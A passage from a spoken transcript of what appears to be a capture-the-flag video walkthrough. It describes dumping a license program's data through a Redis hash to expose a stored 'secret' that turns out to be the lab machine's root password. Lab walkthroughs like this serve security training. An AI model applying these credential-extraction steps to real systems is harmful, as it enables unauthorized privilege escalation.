have the plain text license key. And let's see, it's going to be formatted in such an awful way. Let's see, they'll probably separate on comma, maybe. Let's try that real quick. V out. Do I want to do set paste first and put this all in one line? I can't do that. Okay. %s, comma, \r, \n, g. It's slightly better. So we can see salt, encryption key, user profile. Let's see, where's secret? We see secret is set to uncrackable password. And that is actually going to be the root password. So let's cat out. Oh, I did not even save that. You can just grab it off of this. It was near the top. Uncrackable password. And we got it. But again, whoops, don't mean to do that. Since that was all just a dictionary, we could have also specified globals, and I think it was called secret. So now when we do an hget all ipsec, we have it all the way defined like that. And let us run the license again. And we only extract what we wanted. And we can see that is going to be the uncrackable password here. It's not exactly what I expected. I expected just to see that variable, but I may have been misremembering how it worked. Let's see. V user bin license line strip. Does secret get changed at all? That may be actually the whole line. I guess the thing I'm confused about real quick is why it was... Oh, we have a secret encoded, and that's just uncrackable password. So what does that look like? So after the strip, it just does that. Okay. So if we look at what the key is, so we go into the license directory, cat secret, we have that. So hope you guys enjoyed the video. That's going to be it. So take care, and I will see you all next time.